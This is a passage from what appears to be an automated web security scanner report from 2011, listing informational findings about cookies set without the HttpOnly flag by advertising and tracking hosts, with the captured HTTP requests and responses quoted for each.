rsi_segs_1000000=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; rtc_8mNC=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

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_8mNC=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=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; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:37:37 GMT; Path=/
Set-Cookie: rtc_IF8h=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; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:37:37 GMT; Path=/
Set-Cookie: NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4df0b081&1&10592&4dcb7bc9&271d956a153787d6fee9112e9c6a9326; Domain=.revsci.net; Expires=Thu, 09-Jun-2011 11:37:37 GMT; Path=/
X-Proc-ms: 4
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 12 May 2011 11:37:36 GMT
Content-Length: 759

/* Vermont 12.4.0-1203 (2011-04-19 22:06:07 UTC) */
rsinetsegs=['K05539_10579','K05539_10529','K05539_10592'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsi
...[SNIP]...

14.123. http://pixel.33across.com/ps/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.33across.com
Path:   /ps/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ps/?pid=454&uid=4dc048d9159e4ae3 HTTP/1.1
Host: pixel.33across.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh42.html
Cookie: 33x_ps=u%3D7708659745%3As1%3D1304431102142%3Ats%3D1304431102142

Response

HTTP/1.1 200 OK
P3P: CP='NOI DSP COR NID PSA PSD OUR IND UNI COM NAV INT DEM STA'
Set-Cookie: 33x_ps=u%3D7708659745%3As1%3D1304431102142%3Ats%3D1304431102142; Domain=.33across.com; Expires=Fri, 11-May-2012 11:49:38 GMT; Path=/
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate
Expires: Thu, 01-Jan-70 00:00:01 GMT
X-33X-Status: 0
Content-Type: image/gif
Content-Length: 43
Date: Thu, 12 May 2011 11:49:37 GMT
Connection: close
Server: 33XG1

GIF89a.............!...
...,...........L..;

14.124. http://pixel.quantserve.com/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel;r=1869178149;fpan=0;fpa=P0-487374334-1303349183888;ns=1;url=http%3A%2F%2Fmediacdn.disqus.com%2F1304984847%2Fbuild%2Fsystem%2Fdef.html%23xdm_e%3Dhttp%253A%252F%252Fwww.foxbusiness.com%26xdm_c%3Ddefault5912%26xdm_p%3D1%26;ref=http%3A%2F%2Fwww.foxbusiness.com%2Fmarkets%2F2011%2F05%2F03%2Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%2F;ce=1;je=1;sr=1920x1200x16;enc=n;ogl=;dst=1;et=1305200291459;tzo=300;a=p-94WKwgUwZHlfo HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
Referer: http://mediacdn.disqus.com/1304984847/build/system/def.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4dab4f93-dea96-f475f-85ff7; d=EKcAJe8kjVmM-5GL0ZmY8frRi58oyBABwAEB3QaB1QCa0aWZVw8Ys9HNGFnDDCAJKLPR1KLMUgsqOEwdP-EQwgDB8QggINIOIAnRO7YKkZLHQxIIILsywStxxIP-FMWRtTqB4eaRAE0gDokgDDAOw0DRsQnSk5SjiyM

Response

HTTP/1.1 302 Found
Connection: close
Location: http://ad.yieldmanager.com/pixel?id=669180&t=2
Set-Cookie: d=EMoAJe8kjVmM-5GL0ZmY8frRi58oyBABwwEB3QaB1QCa0aWJVAsQ8Ys9HNGFnDDCAJKLPR1KLMUgsqOEwdP-EQwgDB8QggINIOIAnRO7YKkZLHQxIIILsywStxxIP-FMWRtTqB4eaRAE0gDokgDDAOw0DRsQnSk5SjiyMA; expires=Wed, 10-Aug-2011 11:38:11 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 0
Date: Thu, 12 May 2011 11:38:11 GMT
Server: QS


14.125. http://privatemoneytalk.com/wp-content/plugins/wp-spamfree/js/wpsf-js.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://privatemoneytalk.com
Path:   /wp-content/plugins/wp-spamfree/js/wpsf-js.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wp-content/plugins/wp-spamfree/js/wpsf-js.php HTTP/1.1
Host: privatemoneytalk.com
Proxy-Connection: keep-alive
Referer: http://privatemoneytalk.com/?utm_source=msn&utm_medium=cpc&utm_term=private%20equity
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=de1b43854ac8584ac515dd5952657099; sbmg_footerShowAfter=1

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:02:35 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: lGemmlivtkpdgBpx=xxrqDlBtmdeogahz; path=/
Content-Type: application/x-javascript
Content-Length: 1526


// WP-SpamFree 2.1.1.2 JS Code :: BEGIN

// Cookie Handler :: BEGIN
function GetCookie( name ) {
   var start = document.cookie.indexOf( name + '=' );
   var len = start + name.length + 1;
   if
...[SNIP]...

14.126. http://r.turn.com/r/bd

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.turn.com
Path:   /r/bd

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/bd?ddc=1&pid=18&uid=CAESEA4m3NbIVFSubIriNyJB6xg&cver=1 HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2931142961646634775&mktid=40&mpid=-1&fpid=-1&rnd=7978057364051197680&nu=n&sp=n
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=...[SNIP]...; fc=...[SNIP]...; pf=...[SNIP]...; rrs=1%7C6%7C3%7C4%7C1002%7C6%7C7%7C4%7C9%7C10%7C1003%7C1006%7C2%7C1001%7C1004%7C12%7Cundefined%7Cundefined%7C1008; rds=15106%7C15104%7C15106%7C15105%7C15104%7C15105%7C15106%7C15105%7C15105%7C15104%7C15104%7C15104%7C15104%7C15104%7C15104%7C15105%7Cundefined%7Cundefined%7C15105; rv=1; uid=2931142961646634775

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2931142961646634775; Domain=.turn.com; Expires=Tue, 08-Nov-2011 11:40:08 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Thu, 12 May 2011 11:40:08 GMT

GIF89a.............!.......,...........D..;

14.127. http://r.turn.com/r/beacon

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.turn.com
Path:   /r/beacon

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /r/beacon?b2=6YtkBrDAE9IC5hFHjnB-yIAsYMfEACa-nO9phD-NOvPPVx7awJtIT5bFbQ7adJJ3wc3E_rvvWKH9Who8_my78Q&cid= HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxbusiness/300x250/ros?t=1305200290013&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxbusiness.com%2Fmarkets%2F2011%2F05%2F03%2Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%2F&refer=http%3A%2F%2Fwww.foxbusiness.com%2Fmarkets%2F2011%2F05%2F03%2Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rrs=1%7C6%7C9%7C4%7C1002%7C6%7C1%7C4%7C9%7C10%7C1003%7C1006%7C2%7C1001%7C1004%7C12%7Cundefined%7Cundefined%7C1008; rds=15106%7C15104%7C15104%7C15105%7C15104%7C15105%7C15104%7C15105%7C15105%7C15104%7C15104%7C15104%7C15104%7C15104%7C15104%7C15105%7Cundefined%7Cundefined%7C15105; rv=1; uid=2931142961646634775; adImpCount=...[SNIP]...; fc=...[SNIP]...; pf=...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2931142961646634775; Domain=.turn.com; Expires=Tue, 08-Nov-2011 11:39:34 GMT; Path=/
Set-Cookie: pf=WDvFewANz5aN8ro--w_16OWau98iyOvVBtELDm2CHBX3Y07UZZPNWkK0EEUc7vAIfR8HsN28iFo6HdZJoYg637PetD2cA8xvvUoLcxur2sY9fHKHYMFFN8lXedjo-9PSl7cxfV18_Sz5Ng8ld_X1HRD_Z0wavqycrsQiFm9QZ_cEiXIeYRMvKu7l5KMvI7vm5dIdkRDTWQbgsHbEqQ37nNUVLZ0Aao2DGLgHCvs2_7zryFKliROAgCua8ygDf1pakle_qtze5tuAztFdGBKVECTB7Xzn-K67XFaryRa1HZxI2I4ae6CgiuH5tIIfNklQtPVt9L7Re7DJQWcHmwQpjCrTXh7XKumV-55sx735V56Jk4XT225c3_swkSHYmMoPRdlNOnviq7ipDvEZZ28_V5Fbphl8v0SeqcE1X29Q-XyrU8sC-NXPyqnKzoVqupwvxUtMxmzso7-ONZHGiWUGKIB5A9jubvG7JBvQXHiT1KdKWNG3ES2yEoYLCL7aUl8asmh83Bb_ySNRje2rNa0JxJcm9v4jeIQaPDoq3ACAJUl7IbOZHAHBMdmXe3UBRvsYdSrxi9Ecxa8kZThzZO6aeaas-roJj2Q-EkNpkXZbbvVeMLxvS4wRCkwyiayF00GI87TrIFafDjcHfusIoBCt22M89fvyKULVFnbtZFl9IUsQMSIRccJ6LX18XE1Nig_UUM1LGzqpcEk-rCFc1h0gpIm4Jd_QzLPdPOtdCEBAr8-8Upa6arFOpzab1pE0nDFPJkwT2KZhbD0CfG9KxUTYwAFaSuXROCWsvv1Xz_lvc5qDt8mPl3WKPA4r9Z1gJfOmbqLNFcfz6PEd-FrnEa4vrIqD8lkDUeWN7s4a9OueTLFISSSIDOlXxHejUMi7IABVrusAKookKb0pVS3987apnl6V-rQ-B6QHbtXcTAYqkWjgVeaX3klJElZGLoYa-ZuDh0Rayp3OOR_oU3ir4FomV_sy9RDK5uLzRDwQH4f7LIcJgVM65M6j7w5NDkyKKdRFf9BQS5tHIpXFtO5hdEHLwCf--aHQI9IDIlxI42NaIlUstjD2A4WMWerhztm-_a52YMN7bn25_9xS91STZcx-i0-bRhoYC7RhcSIMsIQ7o0TqwXhB0ipLjKZAXfISS2P-JyYO4jfdwozjhGCHarNmQ5BqLyG2YANF-FI5msFkFMG8UVACbcQT2qm5FtDkcuLLHIdQZhTfGyFVeET5DlWfImOBriO51iBaS4__ZMz5kSB3HnuOE2bKY8AnlZVaxKnjE3wXoM7fzLRqnlHVUJnantU17q7RnOwBeHgICWJsFQhc5wErZcKgnhVskq0bqyxhv_wjCGmN2gxKw0dhDnPYP_0Mmfi4j9yfMUwSdI9Lj7zJoKt8QnzKrSSc_RuX7K1PHnQtlNj8JmeKpHFW1PRfTb0fyYghIq-IITFkYc_uI9YSpJVpN2FNg5u_cdS3RjPCyL40JPKaH3V39NisQu1y367wTC7MmfceuL1HdWZa_yTHCCN0MTXDwR0tX3R7CB1nx3sRNCxKgOOP_38C_7cJoCDagfHqnmufnkMRoDa8dwQ; Domain=.turn.com; Expires=Tue, 08-Nov-2011 11:39:34 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Thu, 12 May 2011 11:39:34 GMT

GIF89a.............!.......,...........D..;

14.128. http://r.turn.com/server/pixel.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.turn.com
Path:   /server/pixel.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /server/pixel.htm?fpid=4&sp=y&admeld_call_type=iframe&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxbusiness/300x250/ros?t=1305200290013&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxbusiness.com%2Fmarkets%2F2011%2F05%2F03%2Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%2F&refer=http%3A%2F%2Fwww.foxbusiness.com%2Fmarkets%2F2011%2F05%2F03%2Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rrs=1%7C6%7C9%7C4%7C1002%7C6%7C1%7C4%7C9%7C10%7C1003%7C1006%7C2%7C1001%7C1004%7C12%7Cundefined%7Cundefined%7C1008; rds=15106%7C15104%7C15104%7C15105%7C15104%7C15105%7C15104%7C15105%7C15105%7C15104%7C15104%7C15104%7C15104%7C15104%7C15104%7C15105%7Cundefined%7Cundefined%7C15105; rv=1; uid=2931142961646634775; adImpCount=...[SNIP]...; fc=...[SNIP]...; pf=...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2931142961646634775; Domain=.turn.com; Expires=Tue, 08-Nov-2011 11:39:40 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 12 May 2011 11:39:40 GMT
Content-Length: 335

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=2931142961646634775&rnd=7069035459346560135&fpid=4&nu=n&t=
...[SNIP]...

14.129. http://segments.adap.tv/data/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://segments.adap.tv
Path:   /data/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /data/?p=cadreon&type=gif&segment=11&add=true HTTP/1.1
Host: segments.adap.tv
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxbusiness/300x250/ros?t=1305200290013&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxbusiness.com%2Fmarkets%2F2011%2F05%2F03%2Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%2F&refer=http%3A%2F%2Fwww.foxbusiness.com%2Fmarkets%2F2011%2F05%2F03%2Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adaptv_unique_user_cookie="3547400152957574101__TIME__2011-05-10+06%3A15%3A14"; audienceData="{\"v\":2,\"providers\":{\"10\":{\"f\":1305874800,\"e\":1305874800,\"s\":[],\"a\":[]},\"8\":{\"f\":1307602800,\"e\":1307602800,\"s\":[1785],\"a\":[]}}}"

Response

HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Expires: Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="3547400152957574101__TIME__2011-05-12+04%3A39%3A28";Path=/;Domain=.adap.tv;Expires=Sun, 18-Jan-2043 13:26:08 GMT
p3p: CP="DEM"
Cache-Control: no-cache
Set-Cookie: audienceData="{\"v\":2,\"providers\":{\"10\":{\"f\":1305874800,\"e\":1305874800,\"s\":[],\"a\":[]},\"9\":{\"f\":1307775600,\"e\":1307775600,\"s\":[528],\"a\":[]},\"8\":{\"f\":1307602800,\"e\":1307602800,\"s\":[1785],\"a\":[]}}}";Path=/;Domain=.adap.tv;Expires=Sun, 18-Jan-2043 13:26:08 GMT
Content-Type: image/gif
Server: Jetty(6.1.26)
Content-Length: 42

GIF89a.............!.......,...........D.;

14.130. http://segs.btrll.com/v1/tpix/-/-/-/-/-/sid.6543457%22%20height=%221%22%20width=%221%22

Summary

Severity:   Information
Confidence:   Certain
Host:   http://segs.btrll.com
Path:   /v1/tpix/-/-/-/-/-/sid.6543457%22%20height=%221%22%20width=%221%22

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /v1/tpix/-/-/-/-/-/sid.6543457%22%20height=%221%22%20width=%221%22 HTTP/1.1
Host: segs.btrll.com
Proxy-Connection: keep-alive
Referer: http://www.ft.com/indepth/privateequity
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BR_MBBV=Ak2t54ZK4gSTAbNTSdI; DRN1=AGPX0VFwToYAY9jFTmLU2QBj2O5OYtTZAGPYv05i1NkAY9wyTj6xcgBj3C9OGFRjAGPa4VGL6aQ

Response

HTTP/1.1 302 Found
Date: Thu, 12 May 2011 11:03:02 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Set-Cookie: BR_MBBV=Ak2t54ZK4gSTAbNTSdI; expires=Thu, 10-May-2012 11:03:02 GMT; path=/; domain=.btrll.com
Expires: Tues, 01 Jan 1980 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: DRN1=AGPX0VFwToYAY9jFTmLU2QBj2O5OYtTZAGPYv05i1NkAY9wyTj6xcgBj3C9OGFRjAGPa4VGL6aQAY9hhTkJlZg; expires=Sat, 11-May-2013 11:03:02 GMT; path=/; domain=.btrll.com
Location: http://cache.btrll.com/default/Pix-1x1.gif
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


14.131. https://services.sungarddx.com/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://services.sungarddx.com
Path:   /default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /default.aspx?FM=Providence+Funds HTTP/1.1
Host: services.sungarddx.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: /default.aspx?DN=161476,1,Documents
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Date: Thu, 12 May 2011 11:41:31 GMT
Content-Length: 162
Set-Cookie: BIGipServerinvspdxweb001_002_003_004=2526607763.20480.0000; path=/

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fdefault.aspx%3fDN%3d161476%2c1%2cDocuments">here</a>.</h2>
</body></html>

14.132. http://tags.bluekai.com/site/668

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/668

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/668 HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://www.foxbusiness.com/markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkp1=; bku=exy99JnggW62duLG; bko=...[SNIP]...; bkw5=; bkst=...[SNIP]...; bklc=4dcaa395; bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101EbdIJxF9Wk5O+x=; bk=nlnE/1V5c/sVIHOf; bkc=...[SNIP]...; bkdc=res

Response

HTTP/1.0 200 OK
Date: Thu, 12 May 2011 11:37:58 GMT
Set-Cookie: bklc=4dcbc695; expires=Sat, 14-May-2011 11:37:57 GMT; path=/; domain=.bluekai.com
